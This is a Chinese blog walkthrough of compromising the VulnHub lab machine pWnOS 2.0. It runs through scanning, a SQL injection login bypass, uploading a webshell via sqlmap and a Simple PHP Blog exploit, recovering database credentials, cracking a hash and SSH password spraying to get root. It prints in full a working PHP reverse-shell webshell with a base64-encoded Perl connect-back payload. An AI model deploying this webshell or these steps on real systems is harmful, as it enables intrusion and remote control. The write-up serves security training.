[VulnHub靶机渗透] pWnOS 2.0

这篇具有很好参考价值的文章主要介绍了[VulnHub靶机渗透] pWnOS 2.0。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!


目录

一、前言

二、外围打点——信息收集

1、主机探测

2、端口扫描

3、漏洞扫描

三、信息收集+渗透测试

1、web渗透测试

2、利用sqlmap上传木马,拿www-data权限

3、Simple PHP 框架漏洞利用,拿www-data权限

四、提权

1、常规提权操作+信息收集

3、crackmapexec密码碰撞

4、root权限


一、前言

靶机精讲之pWnOS 2.0,vulnhub靶机,简洁明快的攻击链,php+mysql架构cms渗透的样本。从利用选择、反弹shell获得,到信息搜集和枚举,以及mysql数据库的翻找,都可以算上php+mysql架构cms渗透的标准靶机,很多更复杂的渗透也是在此基础上的展开的,这台靶机是可以深入思考,形成思维框架的靶机。

需要注意的是,这个靶机我们下载下来,默认是个静态的IP:10.10.10.100,所以我们需要把我们的wmvare的虚拟网卡设置为10.10.10.0/24网段的地址。

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

你需要点击下面的更改设置,把网段设置为10.10.10.0/24网段的,因为我这里是NAT模式,所以该的是NAT模式的网段

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

改完之后,重启kali,就会发现我们的IP变成了10网段的了:

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

二、外围打点——信息收集

1、主机探测

通过利用arp进行主机探测,发现靶机的IP地址是10.10.10.100,其实我们开始也讲到了,这个靶机被打包下载的时候。默认IP就是10.10.10.100。

┌──(root💀kali)-[~/桌面]
└─# arp-scan -l

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

2、端口扫描

可以看到这台靶机只开放了22、80端口, 22的话一般靶机后面肯定都是用来利用ssh远程连接的,那么我们就需要信息收集账号密码了,web的80端口毫无疑问是首选的渗透测试方向。

┌──(root💀kali)-[~/桌面]
└─# nmap -sS -A -p- 10.10.10.100

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

因为扫描发现的端口有点少,我们这里再利用nmap扫描UDP端口开放的情况

扫描发现,UDP端口没有什么有价值的端口

┌──(root💀kali)-[~/桌面]
└─# nmap -sU --min-rate 10000 10.10.10.100

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

3、漏洞扫描

通过利用nmap的漏洞扫描库,扫描到这个靶机的登录页面和注册页面存在csrf,以及扫描到了一些目录,我们到时候可以尝试访问下。

┌──(root💀kali)-[~/桌面]
└─# nmap --script=vuln -p22,80 10.10.10.100

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

三、信息收集+渗透测试

1、web渗透测试

直接访问这个IP的80端口 ,是个静态的html页面,右边有注册和登录的页面,

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

看到这种登录框,我们首先可以尝试下弱口令登录,然后再尝试下是否存在sql注入,

我这里尝试输入单引号',然后发现页面报错,那么存在sql注入

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

然后我们再利用sql注入的万能密码尝试登录,发现成功登录进去了,但是里面内容没有任何回显,一直就是显示正在登录中,这个情况也很有可能是后台存在防火墙之类的防护设备,但是没关系,至少我们知道了这里存在sql注入漏洞。

admin'or'1'=1#

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

2、利用sqlmap上传木马,拿www-data权限

这里给大家提供一个很好用并且很稳定的反弹shell木马文件:

GIF89a
<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "10.10.10.128";
$yourport = '4444';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>

我们只需要修改下面两个参数就可以了,一个是监听的IP地址,还有一个就是监听的端口。

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

然后我们这里就可以利用sqlmap上传木马到靶机的指定目录位置,然后kali监听,浏览器访问木马所在的位置,点击木马,就可以拿到shell了。

我们先利用dirsearch扫描目录,看看有哪些目录上传点,比如:(/var/www,/var/www/includes,/var/www/blogs/images)

┌──(root💀kali)-[~/桌面]
└─# dirsearch -u http://10.10.10.100

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

我这里选择/includes目录下,木马上传到指定目录/var/www/includes/下了。

┌──(root💀kali)-[~/桌面]
└─# sqlmap -u 'http://10.10.10.100/login.php' --data='email=admin&pass=admin&submit=Login' --level=5 --risk=3 --file-write='webshell.php' --file-dest='/var/www/includes/webshell.php'

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

kali先监听,然后浏览器点击上传的木马,就可以看到反弹设立了成功了。

┌──(root💀kali)-[~/桌面]
└─# nc -lvvp 4444

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

3、Simple PHP 框架漏洞利用,拿www-data权限

我们前面进行的目录扫描以及漏洞扫描,都发现/blog目录,我们访问看下

我们可以看到,这个页面看着很老,就像是以前的老版本的某个CMS框架搭建的,所以我们可以利用whatweb或者其他工具进行查看下它是哪个cms框架搭建的。

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

我们可以看到存在Simple PHP Blog 0.4.0框架,你要是问我怎么就知道这个漏洞,其实不是说一眼知道的,比如我们在现实中进行渗透测试也是一样,信息收集过程中,碰到不会的信息,我们收集起来问chatgpt,然后上网检索,这里面的很多关键词我都上网查找了,当我检索Simple PHP Blog 0.4.0的时候,发现exp存在这个漏洞。

┌──(root💀kali)-[~/桌面]
└─# whatweb http://10.10.10.100/blog/

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

我们这里直接利用kali的searchsploit命令检索,然后再看看使用哪个exp进行渗透测试;

我们可以看到有两个,第一个是创建账户密码,第二个是利用这个exp可以执行cmd命令,我这里选择第一个,直接创建账户密码,然后登录后台,再进行下一步的渗透测试工作。

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

下载这个exp,然后看看这个exp的使用方法,要是看不懂的师傅,可以利用chatgpt或者上网查,都是可以查找到的!!!

┌──(root💀kali)-[~/桌面]
└─# searchsploit -m 1191.pl

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

这里就是这个exp的使用方式了,我们可以看到-e选择3,是可以创建用户密码的,那么我们就用这个命令执行exp。

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

插叙:如果出现运行报错Can't locate Switch.pm in @INC,应该是perl版本依赖未安装的问题,运行如下命令即可。

apt install libswitch-perl

可以看到我们这里已经成功创建了用户名和密码了

perl 1191.pl -h http://10.10.10.100/blog -e 3 -U routing -P 1234

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

我们成功登录进来了,并且我们发现这里有一个文件上传的功能点,我们尝试上传我们开始的webshell.php木马上去。

上传成功了,这个网站确实是老旧啊,一点过滤都没有.php木马直接就上传上去了,

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

木马上传成功了,那么我们目前就肯定得找到这个木马上传的位置,我们扫描看看这个目录下有哪些子目录之类的,扫描完毕,那就是挨个试目录了,后来发现木马上传到/blog/images/目录下

┌──(root💀kali)-[~/桌面]
└─# dirsearch -u http://10.10.10.100/blog/ -x 403

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

可以看到,我们的kali已经接收到了木马的反弹shell了。

python -c 'import pty;pty.spawn ("/bin/bash")'   //交互式shell

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

四、提权

1、常规提权操作+信息收集

我们一般拿到交互式shell,首先查看下注册表是否有定时任务之类的,然后查看下哪些有SUID提权以及sudo 提权,但是这里都不行,那么我们就需要在文件目录里面进行信息收集,查找下是否有什么有价值的信息,特别是账号密码之类的。

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

我们在网站根目录找到了数据库的登录账号密码

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

但是尝试mysql登录,没有登录成功,这里不应该,我猜测应该是作者故意留的假的账号密码,但是这个存在mysql数据库的账号密码文件应该是真实存在的,但是这个应该是障眼法,所以我们直接检索下,这个文件。

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

发现/var/目录下还确实有mysqli_connect.php文件,我们cat查看下

找到了mysql数据库的账号密码,我们再进行尝试登录,发现登录成功了


www-data@web:/var/www$ find / -name Hmysqli_connect.php 2>/dev/null
find / -name mysqli_connect.php 2>/dev/null
/var/mysqli_connect.php
/var/www/mysqli_connect.php

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

查找mysql数据库里面的信息,发现账号密码,不过这里密码进行了加密,我们利用kali的hash嗅探工具进行检查下,看看是什么加密。

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

发现是SHA-1加密的,我们找个在线解密工具

┌──(root💀kali)-[~/桌面]
└─# hash-identifier "c2c4b4e51d9e23c02c15702c136c3e950ba9a4af"

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

这个在线解密工具师傅们可以收藏下,这个网站有好多类型的解密,而且这个网站的库还很大,一般都可以解密出来。

Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Email, SHA512, Wordpress, Bcrypt hashes for free onlineDecrypt and crack your MD5, SHA1, SHA256, MySQL, MD5 Email, SHA256 Email, and NTLM hashes for free online. We also support Bcrypt, SHA512, Wordpress and many more.https://hashes.com/en/decrypt/hash

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

利用解密出来的两个账号密码进行ssh远程登录,发现都没有用,那么我们就需要收集更加多的账号密码进行密码碰撞。

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

3、crackmapexec密码碰撞

直接看下/etc/passwd下有哪几个用户更root用户的权限一样的,直接加入到user爆破字典中。

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

经过收集,我们的用户和密码的字典如下:

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

我们可以看到,这个 root:root@ISIntS账号密码不就是我们开始登录MySQL数据库的嘛,这其实也是我们现实中做渗透测试中常见的,就是很多地方,作者自己会把好几个账号密码都设置成一个。

┌──(root💀kali)-[~/桌面]
└─# crackmapexec ssh 10.10.10.100 -u user.txt -p passwd.txt --continue-on-success

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具

4、root权限

恭喜我们成功拿到了root权限,这台靶机也就成功拿下了!!!

[VulnHub靶机渗透] pWnOS 2.0,web,【精选】VulnHub 渗透测试靶场练习平台,代码,CTF,网络安全,web安全,vulnhub,渗透测试,测试工具文章来源地址https://www.toymoban.com/news/detail-847034.html

到了这里,关于[VulnHub靶机渗透] pWnOS 2.0的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • vulnhub_DeRPnStiNK靶机渗透测试

    VulnHub2018_DeRPnStiNK靶机 https://www.vulnhub.com/entry/derpnstink-1,221/ flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6) flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd) 信息收集 使用nmap扫描靶机发现开放了 21 22 80 端口,

    2024年02月08日
    浏览(39)
  • Vulnhub之 BoredHackerBlog: Social Network 2.0靶机详细测试过程

    作者:jason huawen 名称:BoredHackerBlog: Social Network 2.0 地址: 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.169 NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、8000(http) /databases/目录中有2个sql文件,将其下载到本地 Insert语句中,并没有密码值,有点奇怪

    2023年04月23日
    浏览(33)
  • vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势)

    信息收集就略了,nmap就可以了,没有太多知识 你会收集到 1.网页绝对路径,这里通过sql注入上传文件或者通过sqlmap获取–os-shell会用到 2.http://靶场ip/se3reTdir777/index.php# 这是一个sql注入页面 先测试有无SQL注入漏洞,输入SQL注入测试神技  \\\' 进行测试 提示我们存在SQL语句错误,表

    2024年01月21日
    浏览(46)
  • 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

    vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 这是一个漏洞靶机,老样子需要找到flag即可。 官方下载:https://download.vulnhub.com/myfileserver/My_file_server_2.o

    2023年04月19日
    浏览(49)
  • VulnHub靶机渗透:SKYTOWER: 1

    https://www.vulnhub.com/entry/skytower-1,96/ 靶机IP:192.168.56.101 kali IP:192.168.56.102 发现22端口过滤,开放了80和3128端口,那就是优先级80,3128,22。 日常,先目录爆破 在目录爆破的过程中查看网页内容。 发现登录框,尝试万能密码。(这里用户和密码一样) 报错了,错误信息为 从这

    2024年02月10日
    浏览(86)
  • Vulnhub靶机渗透学习——DC-9

    本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC9 还是老样子只有拿到root权限才可以发现

    2024年02月09日
    浏览(45)
  • [VulnHub靶机渗透]:billu_b0x 快速通关

    目录 前言: 访问80端口的web页面 1.扫描目录

    2024年01月21日
    浏览(41)
  • VulnHub靶场渗透实战11-Billu_b0x

    kali:192.168.3.9 桥接模式。 靶机:192.168.3.12 桥接模式(nat模式也可以,我桥接是为了方便我物理机的浏览器访问) 1.arp扫描(也可用nmapC段发现),主机发现。 获取的靶机IP地址是:192.168.3.12。  2.扫描开启的端口和服务。  访问一下80端口开放的web页面。  2.看这页面可能存在

    2024年02月01日
    浏览(39)
  • BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)

    渗透测试(Penetration test)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。 Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况

    2024年02月13日
    浏览(49)
  • 【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)

    Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权) 靶场地址 提取码:rong 🔥系列专栏:Vulnhub百个项目渗透 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 📆首发时间:🌴2022年8月30日🌴 🍭作者水平很有限,如果发现错误,还望告知,感谢! ` 本文章仅用作实验学习,

    2024年02月06日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包